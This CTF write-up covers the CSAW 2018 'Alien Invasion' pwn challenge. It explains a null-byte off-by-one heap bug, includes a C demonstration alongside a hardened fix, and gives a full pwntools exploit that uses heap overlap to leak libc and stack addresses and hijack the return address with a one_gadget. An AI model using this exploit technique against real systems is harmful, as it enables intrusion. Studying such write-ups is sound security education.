Tags: libc fastbin 

Rating:

**Description**

> Construct additional pylons
>
> `nc pwn.chal.csaw.io 9004`
>
> Binary updated: 8:17 AM Sat
>
> Libc updated: 4:09 PM Sat

**Files provided**

- [`aliensVSsamurais`](https://github.com/Aurel300/empirectf/blob/master/writeups/2018-09-14-CSAW-CTF-Quals/files/alien-invasion-aliensVSsamurais)
- [`libc-2.23.so`](https://github.com/Aurel300/empirectf/blob/master/writeups/2018-09-14-CSAW-CTF-Quals/files/alien-invasion-libc-2.23.so)

**Solution** (by [Mem2019](https://github.com/Mem2019))

The samurai part seems to be unexploitable, but there is a null-byte off-by-one in `new_alien`: the name buffer is `size` bytes long, yet the terminator is written at the index `read` returns, which can be equal to `size`:

```c
v0->name[(signed int)read(0, v0->name, size)] = 0; // off by one: read() may return `size`, so the 0 lands one byte past the buffer
v1 = alien_index++;
```

With that byte we can do the classic null-byte poisoning: shrink the size field of a free chunk so the allocator loses track of where it really ends, then trigger a backward consolidation that yields a free chunk overlapping chunks that are still in use. We cannot write `__malloc_hook` or `__free_hook` here, but the alien structure holds a pointer to its name, and the rename option both prints through that pointer and writes the new name through it. Overwriting that pointer via the overlapping chunk therefore gives an arbitrary read and write: read `environ` in libc to leak a stack address, then overwrite the saved return address of `hatchery` with a `one_gadget` address and zero the stack slot its precondition (`[rsp+0x30] == NULL`) requires.
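To make the first step concrete, here is an added example (not code from the original writeup or the challenge binary) that reproduces the `new_alien` write pattern on a hand-built chunk layout instead of a live allocator, so the effect on the neighbouring size field can be checked deterministically. The layout is constructed to match the exploit: a 0x110 chunk handed out for `malloc(0x108)` is directly followed by a free 0x110 remainder whose size field reads 0x111. `vuln_set_name` mirrors the decompiled code (`in`/`in_len` stand in for what `read(0, name, size)` returns), and `safe_set_name` is the hardened form that reserves the last byte for the terminator. All names, offsets and the fake heap are assumptions made for the example.

```c
/*
 * Added example: model of the new_alien null-byte off-by-one on a fake heap.
 * Not part of the original writeup; layout and sizes are constructed to
 * mirror the exploit's first step (malloc(0x108) split off a 0x220 chunk,
 * leaving a 0x111-sized free remainder right behind it).
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

#define FAKE_HEAP_LEN     0x300
#define CHUNK_A           0x000                    /* chunk handed to new_alien */
#define CHUNK_A_SIZE      0x110                    /* malloc(0x108) rounds up to 0x110 */
#define CHUNK_B           (CHUNK_A + CHUNK_A_SIZE) /* free remainder right after it */
#define USER(chunk)       ((chunk) + 0x10)         /* user data follows prev_size/size */
#define SIZE_FIELD(chunk) ((chunk) + 0x8)
#define PREV_INUSE        0x1

static uint64_t rd64(const uint8_t *p) { uint64_t v; memcpy(&v, p, 8); return v; }
static void wr64(uint8_t *p, uint64_t v) { memcpy(p, &v, 8); }

/* Two adjacent chunks with glibc-style headers (constructed layout). */
static void build_heap(uint8_t *heap)
{
    memset(heap, 0, FAKE_HEAP_LEN);
    wr64(heap + SIZE_FIELD(CHUNK_A), CHUNK_A_SIZE | PREV_INUSE); /* 0x111, in use */
    wr64(heap + SIZE_FIELD(CHUNK_B), 0x110 | PREV_INUSE);        /* 0x111, free remainder */
}

/*
 * Mirrors the decompiled new_alien: `name` is `size` bytes, and the
 * terminator goes at the index read() returned.  read() may fill the whole
 * buffer, so n == size and the 0 is written to name[size].
 */
static ssize_t vuln_set_name(uint8_t *name, size_t size, const uint8_t *in, size_t in_len)
{
    size_t n = in_len < size ? in_len : size;
    memcpy(name, in, n);
    name[n] = 0;                 /* off by one when n == size */
    return (ssize_t)n;
}

/* Hardened form: never read more than size-1 bytes, so the 0 stays inside. */
static ssize_t safe_set_name(uint8_t *name, size_t size, const uint8_t *in, size_t in_len)
{
    if (size == 0)
        return -1;
    size_t n = in_len < size - 1 ? in_len : size - 1;
    memcpy(name, in, n);
    name[n] = 0;
    return (ssize_t)n;
}

/*
 * Fill chunk A's 0x108 usable bytes (its own 0x100 plus the next chunk's
 * prev_size field) with 'a', exactly as the exploit does, and return the
 * size field of chunk B afterwards.
 */
static uint64_t next_size_after_fill(int hardened)
{
    uint8_t heap[FAKE_HEAP_LEN];
    uint8_t input[0x108];

    build_heap(heap);
    memset(input, 'a', sizeof input);
    if (hardened)
        safe_set_name(heap + USER(CHUNK_A), 0x108, input, sizeof input);
    else
        vuln_set_name(heap + USER(CHUNK_A), 0x108, input, sizeof input);
    return rd64(heap + SIZE_FIELD(CHUNK_B));
}

int main(void)
{
    uint64_t after_vuln = next_size_after_fill(0);
    uint64_t after_safe = next_size_after_fill(1);

    printf("remainder size field 0x111 -> vulnerable: %#llx (PREV_INUSE %s), hardened: %#llx\n",
           (unsigned long long)after_vuln, (after_vuln & PREV_INUSE) ? "set" : "clear",
           (unsigned long long)after_safe);
    return 0;
}
```

Build and run with `cc -Wall -o nullbyte nullbyte.c && ./nullbyte`. The vulnerable path turns the remainder's `0x111` into `0x100`: the allocator now believes the remainder ends 0x10 bytes early, so nothing it later carves out of that region touches the `prev_size` (0x110) or the cleared PREV_INUSE bit of the chunk that really follows, which is what lets the later `free` of that chunk consolidate backwards over live allocations in the exploit below.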

The other parts do not seem useful: the binary has many other problems, but they are unexploitable or hard to exploit.

Exploit:

```python
from pwn import *

g_local = True
context.log_level = 'debug'

if g_local:
    e = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
    sh = process('./aliensVSsamurais')  # env={'LD_PRELOAD':'./libc.so.6'}
    ONE_GADGET_OFF = 0x4526a  # one_gadget in libc-2.23; needs [rsp+0x30] == NULL
    UNSORTED_OFF = 0x3c4b78   # main_arena+0x58: what a lone unsorted chunk's fd/bk point to
    gdb.attach(sh)
else:
    ONE_GADGET_OFF = 0x4526a
    UNSORTED_OFF = 0x3c4b78
    sh = remote("pwn.chal.csaw.io", 9004)
    e = ELF("./libc.so.6")
    # ONE_GADGET_OFF = 0x4557a


def create(length, content):
    """Option 1: new alien. Allocates the alien struct (a 0x20 chunk holding the
    name pointer) and a `length`-byte name buffer, then reads the name into it."""
    sh.send(b"1\n")
    sh.recvuntil(b"How long is my name?\n")
    sh.send(str(length).encode() + b"\n")
    sh.recvuntil(b"What is my name?\n")
    sh.send(content)
    sh.recvuntil(b"Brood mother, what tasks do we have today.\n")


def delete(idx):
    """Option 2: free alien `idx` (struct and name buffer)."""
    sh.send(b"2\n")
    sh.recvuntil(b"Which alien is unsatisfactory, brood mother?\n")
    sh.send(str(idx).encode() + b"\n")
    sh.recvuntil(b"Brood mother, what tasks do we have today.\n")


def editidx(idx, content=None):
    """Option 3: rename alien `idx`. Prints the current name through the struct's
    name pointer (our read primitive), then writes the new name through the same
    pointer (our write primitive). With no content the old name is written back."""
    sh.send(b"3\n")
    sh.recvuntil(b"Brood mother, which one of my babies would you like to rename?\n")
    sh.send(str(idx).encode() + b"\n")
    sh.recvuntil(b"Oh great what would you like to rename ")
    ret = sh.recvuntil(b" to?\n", drop=True)
    sh.send(content if content else ret)
    sh.recvuntil(b"Brood mother, what tasks do we have today.\n")
    return ret


# Samurai menu first.
sh.recvuntil(b"Daimyo, nani o shitaidesu ka?\n")
sh.send(b"1\n")
sh.recvuntil(b"What is my weapon's name?\n")
sh.send(b"1\n")
sh.recvuntil(b"Daimyo, nani o shitaidesu ka?\n")
sh.send(b"3\n")
# use samurai to put malloc hook to 0

sh.recvuntil(b"Brood mother, what tasks do we have today.\n")
create(0x10, b"fastbin")  # 0
create(0x10, b"fastbin")  # 1
delete(0)
delete(1)
# prepare some 0x20 fastbin chunks so later alien structs do not disturb the layout

create(0x210, b"a")        # 2: 0x220 chunk
create(0x100, b"c")        # 3: 0x110 chunk directly behind 2
create(0x100, b"padding")  # 4: keeps 3 away from the top chunk

delete(2)                    # 0x220 chunk goes to the unsorted bin
create(0x108, b"a" * 0x108)  # 5: splits 0x110 off the front; the off-by-one null byte
                             #    hits the remainder's size field: 0x111 -> 0x100
# 0x20 fastbin *1

create(0x80, b"b1")  # 6: 0x90 name chunk at the start of the shrunk remainder
create(0x100 - 0x90 - 0x20 - 0x10, b"b2b2b2b2b2b2b2b2")  # 7: 0x20 struct + 0x50 name fill the rest of the 0x100

delete(6)  # 0x90 chunk goes to the unsorted bin
delete(3)  # chunk 3 still sees prev_size 0x110 with PREV_INUSE clear: consolidates backwards
           # over 6, alien 7's struct and alien 7's name
# 0x221 unsorted bin
# 0x20 *2

create(0xa0, b"consume unsorted + leak")  # 8: 0xb0 split off the 0x220 chunk; the new remainder's fd
                                          #    now sits exactly where alien 7's name pointer points
libc_addr = u64(editidx(7).ljust(8, b"\x00")) - UNSORTED_OFF
print(hex(libc_addr))
delete(8)
# recover to 0x221 unsorted bin
# 0x20 *2

# 9: rewrite alien 7's struct through the overlap: keep its 0x21 size header, point its name at environ
create(0xa0, b"A" * 0x88 + p64(0x21) + p64(libc_addr + e.symbols["environ"]) + p64(0xdeadbeef))
stack_addr = u64(editidx(7).ljust(8, b"\x00"))
print(hex(stack_addr))
delete(9)
# leak = 0xe58  (low bits of the leaked stack address; the offsets below are fixed offsets in the same stack page)

# 0xd48 -> one_gadget 0x30  (saved return address of hatchery)
create(0xa0, b"A" * 0x88 + p64(0x21) + p64(stack_addr - 0xe58 + 0xd48) + p64(0xdeadbeef))  # 10
editidx(7, p64(libc_addr + ONE_GADGET_OFF))
delete(10)

# 0xd80 -> 0  (rsp+0x30 after the ret, the one_gadget's zero precondition)
create(0xa0, b"A" * 0x88 + p64(0x21) + p64(stack_addr - 0xe58 + 0xd80) + p64(0xdeadbeef))  # 11
editidx(7, p64(0))
delete(11)

sh.interactive()
```

Original writeup (https://github.com/Aurel300/empirectf/blob/master/writeups/2018-09-14-CSAW-CTF-Quals/README.md#400-pwn--alien-invasion).